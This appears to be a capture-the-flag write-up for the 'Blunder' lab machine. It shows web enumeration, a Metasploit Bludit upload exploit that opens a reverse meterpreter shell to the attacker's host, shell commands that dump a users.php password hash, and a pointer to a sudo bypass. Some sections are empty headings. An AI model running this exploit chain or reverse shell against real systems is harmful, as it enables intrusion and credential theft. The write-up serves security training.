Blunder

Enumeration

nmap

$ nmap -sC -sV -oN nmap.txt 10.10.10.191

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 21:56 BST
Nmap scan report for 10.10.10.191
Host is up (0.066s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.28 seconds

Apache httpd 2.4.41

dirsearch

$ ./dirsearch.py -u 10.10.10.191 -e *

21:28:51] 200 -    7KB - /0
[21:28:56] 200 -    3KB - /about
[21:28:58] 301 -    0B  - /admin  ->  http://10.10.10.191/admin/
[21:29:00] 200 -    2KB - /admin/
[21:29:00] 200 -    2KB - /admin/.config
[21:29:00] 200 -    2KB - /admin/?/login
...
...
...
[21:29:03] 200 -    2KB - /admin/web/
[21:29:03] 200 -    2KB - /admin/user_count.txt
[21:29:03] 200 -    2KB - /admin/uploads.php
[21:29:31] 301 -    0B  - /domcfg.nsf/?open  ->  http://10.10.10.191/domcfg.nsf
[21:29:42] 200 -   30B  - /install.php
[21:29:45] 200 -    1KB - /LICENSE
[21:30:03] 200 -    3KB - /README.md
[21:30:04] 200 -   22B  - /robots.txt

wfuzz

wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100

===================================================================
ID           Response   Lines    Word     Chars       Payload                                      
===================================================================

000003519:   200        1 L      4 W      22 Ch       "robots"                                     
000004125:   200        4 L      23 W     118 Ch      "todo"    

http://10.10.10.191/admin/

http://10.10.10.191/todo.txt

Potential username: fergus

After some extensive enumeration, the only usefull information found was the "todo.txt" file which contains a possible username ("fergus").

Creating wordlist with cewl

$ cewl -w wordlists.txt -d 10 -m 1 10.10.10.191/

Bruteforcing login cred

Exploitation

Metasploit

$ msf5 > use exploit/linux/http/bludit_upload_images_exec 

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > show options

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS                   yes       The password for Bludit
   BLUDITUSER                   yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.17.168   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2


msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
rhosts => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set lhost 10.10.14.189
lhost => 10.10.14.189
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 10.10.14.189:4444 
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading BamMBogTOe.png...
[*] Uploading .htaccess...
[*] Executing BamMBogTOe.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.189:4444 -> 10.10.10.191:43256) at 2020-08-16 22:46:40 +0100
[+] Deleted .htaccess

meterpreter > ls
Listing: /var/www/bludit-3.9.2/bl-content/tmp
=============================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2020-08-16 22:52:22 +0100  thumbnails

meterpreter > cd /home
meterpreter > ls
Listing: /home
==============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2020-05-26 09:29:29 +0100  hugo
40755/rwxr-xr-x  4096  dir   2020-04-28 12:13:35 +0100  shaun

PivEsc

$ meterpreter > shell
Process 3417 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c "import pty;pty.spawn('/bin/bash')"
$ www-data@blunder:/$ ls
ls
bin    dev  home   lib64       media  proc  sbin  sys  var
boot   etc  lib    libx32      mnt    root  snap  tmp
cdrom  ftp  lib32  lost+found  opt    run   srv   usr
$ www-data@blunder:/$ cd var	
cd var
$ www-data@blunder:/var$ ls
ls
backups  crash	local  log   metrics  run   spool  www
cache	 lib	lock   mail  opt      snap  tmp
$ www-data@blunder:/var$ cd www
cd www
$ www-data@blunder:/var/www$ ls
ls
bludit-3.10.0a	bludit-3.9.2  html
$ www-data@blunder:/var/www$ cd bludit-3.10.0a
cd bludit-3.10.0a
$ www-data@blunder:/var/www/bludit-3.10.0a$ ls
ls
LICENSE    bl-content  bl-languages  bl-themes	install.php
README.md  bl-kernel   bl-plugins    index.php
$ www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content
cd bl-content
$ www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ ls
ls
databases  pages  tmp  uploads	workspaces
$ www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases
cd databases
$ www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls
ls
categories.php	plugins       site.php	  tags.php
pages.php	security.php  syslog.php  users.php
$ www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ 

User: Hugo Pass: faca404fd5c0a31cf1897b823c695c85cffeb98d

Getting user.txt

Getting root.txt

sudo 1.8.27 - Security BypassExploit Database